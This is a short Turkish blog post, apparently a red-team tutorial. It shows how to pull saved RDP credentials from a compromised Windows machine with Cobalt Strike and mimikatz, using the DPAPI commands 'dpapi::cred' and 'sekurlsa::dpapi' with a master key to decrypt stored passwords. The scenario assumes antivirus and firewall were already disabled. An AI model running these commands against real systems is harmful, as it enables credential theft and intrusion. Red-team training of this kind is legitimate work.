Ali Can Gönüllü tarafından 2022-10-07 21:56:52 tarihinde yazıldı. Tahmini okunma süresi 1 dakika, 24 saniye.
Çalışmalarım için bağış yapmak isterseniz Patreon hesabımdan bağışta bulunabilirsiniz.
Blog adresinde yazılanlar sadece eğitim amacıyla deneysel olarak hazırlanmıştır. Konu içerisinde geçen yöntemleri kendi oluşturduğunuz test ortamında denemenizi tavsiye ederiz.
Herhangi bir tarih, yer ve/veya mekanda oluşacak zararlardan alicangonullu.org, alicangonullu.org yöneticisi ve/veya konu yazarı mesul değildir.
Merhabalar,
Bu yazımda Red Team testlerinden biri olan Cobalt Strike ile hedef cihazda kayıtlı RDP bilgilerini almayı anlatacağım şimdiden keyifli okumalar dilerim.
Öncelikle hedef makinemizde IT'nin bağlantı kurduğunu ve bu bağlantıları hatırla dediği bir senaryo hayal ediyoruz. Biz Red Team üyesi olarak bilgisayara daha önceki konularda anlattığım yöntemlerden biriyle sızdık ve bu RDP bilgisini elde ettik. Ardından antivirüsleri ve firewall'ı devre dışı bıraktık. Bu adımlardan sonra sırası ile yapmamız gereken adımlar şunlardır,
Konumu, C:\Users\%user&\AppData\Local\Microsoft\Credentials\
Komutumuz, mimikatz dpapi::cred /in:C:\Users\%user%\AppData\Local\Microsoft\Credentials\CREDENTIAL_KEY
Kırmızı daire içerisindeki key aklımızda bulunsun bir sonraki aşamada işimize yarayacak
Komutumuz, mimikatz sekurlsa::dpapi
Komutumuz, mimikatz dpapi::cred /in:C:\Users\Muhasebe\AppData\Local\Microsoft\Credentials\CREDENTIAL_KEY
/masterkey:MASTER_KEY
Ve tüm RDP bilgileriyle beraber şifremizi de elde etmiş olduk.
Bu konuda daha fazla yazı için takip etmeyi unutmayın!